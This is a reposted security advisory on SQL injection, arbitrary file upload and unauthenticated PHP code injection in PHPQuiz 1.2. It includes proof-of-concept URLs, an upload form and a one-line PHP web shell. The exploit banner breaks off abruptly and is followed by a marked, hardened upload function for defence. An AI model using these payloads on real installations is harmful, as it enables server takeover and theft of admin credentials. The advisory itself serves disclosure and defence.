[Repost] PHPQuiz Multiple Input Validation Vulnerabilities

Source: NSFOCUS (绿盟科技)

PHPQuiz Multiple Input Validation Vulnerabilities

Published: 2006-09-16
Updated: 2006-09-20

Affected systems:
PHPQuiz PHPQuiz <= 1.2
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 20065

PHPQuiz is an online examination/quiz system written in PHP.

The score.php script in PHPQuiz does not properly validate input to the univers parameter, and the home.php script does not properly validate input to the quiz_id parameter, allowing an attacker to carry out SQL injection attacks.

In addition, the back/upload_img.php file in PHPQuiz does not properly validate input to the path parameter, allowing an attacker to upload malicious PHP scripts.

<*Source: Simo64 (simo64@morx.org)

  Link: http://secunia.com/advisories/22015/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

######################################################
#
# Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit
# Vendor  : PHPQuiz
# website : http://www.phpquiz.com
# Version : <= v.1.2
# Severity: Critical
# Author: Simo64 / simo64_at_morx_org
# MorX Security Research Team
# http://www.morx.org
# http://www.morx.org/phpquiz.txt
#
#  Details :
#
# SQL injection in score.php
#***************************
#
#  univers var in score.php and quiz_id var in home.php are not properly verified and can be used to inject query
#
#  PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]
#       http://localhost/phpquiz/front/? ... step=1&quiz_id=[SQL]
#
# Arbitrary File Upload
#**********************
# vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76
#
#  74  if (($upload) && ($ok_update == "yes")) {
#  75
#  76  if(@copy($image, $path)){
#  77  .....
#
# $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files
#
#  PoC Exploit :
#
#  <form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/up ... ./img_quiz/l3ez.php">
#  Download File<br>
#  <input name="image" type="file" size="20"><br>
#  <input type="submit" name="upload" value="Upload"></form>
#
#  phpquiz/img_quiz/ folder is by default writable so after uploading a simple phpshell <?passthru($cmd);?>
#
#  we can launch cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls
#
# PHP Code Injection
#********************
#
# cfgphpquiz/install.php is accessible without authentication , the script is used to
# save configuration setting in config.inc.php.
#
# Impact:
# any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information
# such as admin password (plain text) and login
#
#***********************************************************************************
#
# simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1
#
# /-----------------------------------------------------------\
# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
# |        Coded by simo64 - simo64_morx.org                  |
# |               www.morx.org                                |
# |-----------------------------------------------------------|
# |     MorX Security Research Team
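The upload flaw above comes down to one line: copy($image, $path) with both the source and the destination taken from the request. As an added defensive illustration (this is not PHPQuiz code and not part of the original advisory), the following is how that upload step could be written so the client controls neither the destination path nor the file type. The img_quiz directory and the image form field are taken from the advisory; the size limit, the accepted types and the function name are assumptions.

```php
<?php
// Added example: hardened replacement for the upload step quoted in the advisory.
// The original did: if(@copy($image, $path)) with $image and $path from the request.
// Here the server alone chooses the destination directory and the file name.
declare(strict_types=1);

// Assumption: uploads live in this one fixed directory (img_quiz as in the advisory).
const UPLOAD_DIR = __DIR__ . '/img_quiz';

// Accepted content types, mapped to the extension the server will assign.
// The extension is derived from the sniffed MIME type, never from the client's file name.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Store one uploaded image; return its server-chosen relative path, or null on rejection.
// $file is one entry of $_FILES (for the advisory's form, $_FILES['image']).
function store_quiz_image(array $file): ?string
{
    // Only a successful, PHP-managed upload is considered at all.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Assumed size cap of 2 MiB, checked before the content is inspected.
    if ($file['size'] > 2 * 1024 * 1024) {
        return null;
    }
    // Sniff the real content type; the client-supplied 'type' and 'name' are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    // Server-generated name: random, no path separators, fixed non-executable extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;

    // move_uploaded_file() refuses sources that did not arrive via the upload mechanism,
    // closing the arbitrary-source-path behaviour that copy() allowed.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return 'img_quiz/' . $name;
}

// Usage, after the back/ script's own authentication check:
// $stored = store_quiz_image($_FILES['image'] ?? []);
```

Independently of the code, the web server should be configured not to execute scripts from img_quiz, so that even a misclassified upload cannot be run as PHP.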
